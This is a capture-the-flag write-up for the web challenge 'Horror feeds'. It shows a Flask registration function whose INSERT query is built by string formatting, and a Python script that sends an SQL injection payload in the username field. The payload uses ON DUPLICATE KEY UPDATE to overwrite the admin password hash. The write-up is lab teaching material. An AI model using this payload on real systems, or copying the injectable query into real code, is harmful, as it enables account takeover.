Pierre Gaulon

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[Web] Horror feeds

This web application contains a dashboard, that will display the flag if the logged in user has admin as username. In order to register new users, this application takes a JSON input containing the username and password of the new user.

However the INSERT query is vulnerable to a SQLi

def register(username, password):
    exists = query_db('SELECT * FROM users WHERE username = %s', (username,))
    if exists:
        return False
    hashed = generate_password_hash(password)
    query_db(f'INSERT INTO users (username, password) VALUES ("{username}", "{hashed}")')

    return True

We can exploit it by using a new username to pass the existence check, but concatenate another value for the insert in the password. The only hurdle is that the username has a UNIQUE constraint

CREATE TABLE horror_feeds.users (
    username varchar(255) NOT NULL UNIQUE,
    password varchar(255) NOT NULL

To bypass this constraint, we can tell MySQL how to react in case of conflict with ON DUPLICATE KEY UPDATE

Our final payload is

import requests

host = ""
port = "31104"

def main():
    payload = {
        # password = bbb
        'username': 'test","$2b$12$gOWv7k1i8FRE07xUZE79ueTxXZHA42U5OtYqlmg6yWcyEYF5W9zIa"),("admin","$2b$12$gOWv7k1i8FRE07xUZE79ueTxXZHA42U5OtYqlmg6yWcyEYF5W9zIa") ON DUPLICATE KEY UPDATE password="$2b$12$gOWv7k1i8FRE07xUZE79ueTxXZHA42U5OtYqlmg6yWcyEYF5W9zIa" -- -',
        'password': 'whatever'
    response = requests.post("http://" + host + ":" + port + "/api/register", json = payload)

We can then login with the user admin and the password bbb